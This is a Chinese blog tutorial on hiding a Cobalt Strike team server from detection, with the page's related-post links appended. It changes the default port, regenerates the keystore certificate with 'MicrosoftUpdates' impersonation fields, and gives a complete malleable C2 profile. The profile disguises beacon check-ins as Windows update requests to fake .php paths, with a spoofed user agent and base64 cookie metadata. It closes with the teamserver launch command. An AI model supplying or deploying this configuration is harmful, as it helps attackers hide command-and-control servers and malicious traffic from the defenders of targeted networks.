CobaltStrike服务端自身隐匿技巧

已于 2023-07-13 15:22:57 修改
阅读量2.2k 收藏 4
点赞数 3
文章标签: 哈希算法 安全
于 2021-11-18 12:42:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/121397463
版权

目录

简介: 

一、修改默认端口

二、替换SSL证书

三、修改C2.profile文件

创建并修改C2-profile文件:

四、运行teamserver文件服务端上线

简介: 

很多工具都带有自己的特征,例如sqlmap、awvs等扫描器,一展开扫描就很容易被waf ban掉;或者因为没有隐匿自身特征反被上线。

这里主要是从修改默认端口、替换SSL证书、修改C2.profile文件三方面进行隐匿自己特征。

这里我使用的CobaltStrike4.0版本

一、修改默认端口

vim teamserver

在文件最后一行;默认端口是50050;可以根据情况修改为任意端口。

我这里修改成了10000.

二、替换SSL证书

keytool 是一个Java数据证书和密钥管理工具。

Keytool将密钥(key)和证书(certificates)存在一个称为keystore的文件中,即store后缀文件中。

#命令

 -certreq            生成证书请求
 -changealias        更改条目的别名
 -delete             删除条目
 -exportcert         导出证书
 -genkeypair         生成密钥对
 -genseckey          生成密钥
 -gencert            根据证书请求生成证书
 -importcert         导入证书或证书链
 -importpass         导入口令
 -importkeystore     从其他密钥库导入一个或所有条目
 -keypasswd          更改条目的密钥口令
 -list               列出密钥库中的条目
 -printcert          打印证书内容
 -printcertreq       打印证书请求的内容
 -printcrl           打印 CRL 文件的内容
 -storepasswd        更改密钥库的存储口令

查看证书:

keytool -list -v -keystore cobaltstrike.store

默认密码是: 123456

可以看到别名和证书的所有者包含CS的一些特征。

默认是:

CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth

这里进行一个修改;从新生成一个证书文件:

keytool -genkey -alias ling -keyalg RSA -validity 36500 -keystore ling.store

查看证书:

keytool -list -v -keystore ling.store

 载入证书文件:

keytool -importkeystore -srckeystore ./ling.store -destkeystore ./ling.store -deststoretype pkcs12

三、修改C2.profile文件

创建并修改C2-profile文件:

vi c2.profile

#文件名可以随意

set keystore
set password
set alias
set sample_name "C2 POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
#设置证书
https-certificate {
set CN "US";
set O "MicrosoftUpdates";
set C "en";
set L "US";
set OU "MicrosoftUpdates";
set ST "US";
set validity "365";
}#设置
code-signer{
set keystore "ling.store";
set password "159357";
set alias "ling";
}#指定 DNS beacon 不用的时候指定到 IP 地址
set dns_idle "8.8.4.4";
#每个单独 DNS 请求前强制睡眠时间
set dns_sleep "0";
#通过 DNS 上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
} }
server {
output {
print;
} } }
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
} }
server {
header "Content-Type" "text/plain";
output {
base64;
print;
} } }

 c2lint校验配置文件能否通过

./c2lint c2.profile

 

 

运行失败的话话出现红色异常代码

四、运行teamserver文件服务端上线

./teamserver 192.168.100.142 123123 ling.store

 

成功进入。

Cheng-Ling
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
cobaltstrike 流量隐藏
黑战士的博客
04-17 458
cobaltstrike 监听器设置为 CDN 的地址,HTTPS Host Header 设置为加速的域名。首先需要购买域名,为什么推荐这个网站,便宜且可以使用支付宝支付,免除需要 VISA、国外信用卡麻烦。添加一条 A 记录指向 CS 服务器的公网 IP,再添加几条 NS 记录指向 A 记录域名即可。首先是需要一个域名,国内 VPS 需要备案,国外可以使用。腾讯云配置一定要设置为不缓存,不然上线一次就不上线了。除此以外,转发后的端口从外部仍能扫描,因此需要使用。进行加速,这里使用的是腾讯云。
魔改CobaltStrike:二开及后门生成分析
mai1zhi2的博客
04-21 3007
一、概述: 这次文章主要介绍下Cobalt Strike 4.1相关功能的二开和后门(artifact.exe\beacon.exe)的生成方式,Cobalt Strike的jar包我已反编译,并改了下反编译后的bug,teamserver与agressor均能正常调试使用,附反编译后项目地址: https://github.com/mai1zhi2/CobaltstrikeSource 。若有不对的地方希望大伙指出,谢谢。后续将会再分享通讯协议与自定义客户端(后门)。PS:感谢Moriarty的分享课。
Cobalt Strike配置
最新发布
m0_66993332的博客
05-19 454
Cobalt Strike的配置
Cobalt Strike特征修改
qq_50854662的博客
06-01 2715
修改cs特征
CobaltStrike基础使用详解
weixin_53747497的博客
04-17 3296
Cobalt Strike(简称为CS)是一款团队作战渗透测试神器,是一种可以用来进行横 向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可 以连接多个服务端,一个服务端也可以对应多个客户端连接。Connect to team server:连接服务端Disonnect from team server:断开当前服务端连接Configure Listeners:配置监听器Show sessions in graph view:展示会话列表。
cs(cobaltstrike)隐藏特征
qq_45092459的博客
09-21 864
cs(cobaltstrike)隐藏特征
在服务上搭建CobaltStrike注意
摔不死的笨鸟的博客
12-24 722
cobaltstrike搭建
cobaltstrike服务端+客户端
05-06
cobaltstrike服务端+客户端,包含linux和widows版本
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
CobaltStrike4.7
11-29
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序...
Cobalt Strike4.7最新版
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为...
保姆级教学!小白也会的cobalt strike搭建
一只web狗
11-05 4481
小白也会的cobalt strike搭建,快速部署
Cobalt Strike 使用指南(资源整合笔记)
天在等我,菜鸟想飞
12-30 7026
0x00 写在前面的话 Cobalt Strike自出世以来,一直在红队常用的工具行列。因其优良的团队协作性,被冠以多人运动的必备利器。 本文将网络上各路神仙的经验分享以渗透流程为依据进行了一次整合,旨在提供工具的学习使用流程。 1、工具介绍 CS是什么? Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt Strike集成
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS)
热门推荐
weixin_43263566的博客
01-11 1万+
渗透测试之基本的攻击流程
渗透工具Cobalt Strike安装使用教程
爱玩游戏的黑客的博客
11-23 3520
CS工具使用教程
渗透工具之CS4.0使用说明书
m0_59991869的博客
10-14 4659
CS4.0使用说明书 目录 安装 使用 运行 监听器 listner 使用 不同监听介绍 木马 生成后门 钓鱼攻击 邮件钓鱼 功能 上部选项栏 下部工具栏 beacon的使用 会话功能 安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver
Cobalt Strike 服务器搭建及使用
diansuimo2268的博客
03-10 4140
Cobalt Strike使用中的一些坑(一) http://www.cnblogs.com/miaodaren/articles/7829793.html cobaltstrike3.8服务器搭建及使用 https://www.cnblogs.com/ssooking/p/6017333.html 转载于:https://www.cnblogs.com/7bit/p/10...
cobalt strike客户机和服务端的操作系统
06-06
Cobalt Strike是一种先进的红队工具,主要用于渗透测试和攻击模拟。Cobalt Strike客户机和服务端可以在多种操作系统上运行,包括Windows、Mac OS X和Linux。 对于Cobalt Strike客户机而言,它可以运行在Windows、Mac OS X和Linux等不同的操作系统中。在Windows系统中,Cobalt Strike客户机通常以EXE可执行文件的形式呈现,用户可以通过运行该文件来启动Cobalt Strike。在Mac OS X和Linux系统中,Cobalt Strike客户端则以JAR文件的形式呈现,用户需要安装Java环境并通过命令行来启动它。 对于Cobalt Strike服务端而言,它通常运行在Kali Linux等Linux操作系统中。用户需要下载并安装Cobalt Strike服务端,然后通过命令行启动它。同时,需要注意的是,Cobalt Strike服务端通常需要管理员权限才能正常运行。 总之,Cobalt Strike客户机和服务端可以在多种操作系统上运行,并且具有卓越的渗透测试和攻击模拟功能,因此受到众多安全专家和渗透测试人员的青睐。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值